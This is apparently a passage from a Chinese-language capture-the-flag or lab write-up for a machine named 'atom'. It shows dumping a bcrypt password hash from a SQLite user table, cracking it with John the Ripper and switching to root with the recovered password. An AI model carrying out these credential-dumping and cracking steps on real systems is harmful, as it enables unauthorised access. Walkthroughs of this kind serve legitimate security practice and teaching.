-rwxr-xr-x 1 www-data www-data   1637 Dec 31  2400 profile.php
-rw-r--r-- 1 www-data www-data   5534 Dec 31  2400 register.php
drwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 video

映入眼帘的就是一个 atom-2400-database.db，看看这个文件。

file atom-2400-database.db

atom-2400-database.db: SQLite 3.x database, last written using SQLite version 3040001, file counter 4373, database pages 28, 1st free page 5, free pages 24, cookie 0x3, schema 4, UTF-8, version-valid-for 4373
sqlite3 atom-2400-database.db
SQLite version 3.40.1 2022-12-28 14:03:47

sqlite> .tables
login_attempts  users

sqlite> select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm

又来一个密码，看看能不能解开：

john hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
madison          (?)
1g 0:00:00:01 DONE 2/3 (2024-09-13 03:43) 0.7462g/s 161.1p/s 161.1c/s 161.1C/s goodluck..stephen
Use the "--show" option to display all of the cracked passwords reliably

解开了，madison，看看切换下用户。

su -

root@atom:~# id
uid=0(root) gid=0(root) groups=0(root)

成了。🎉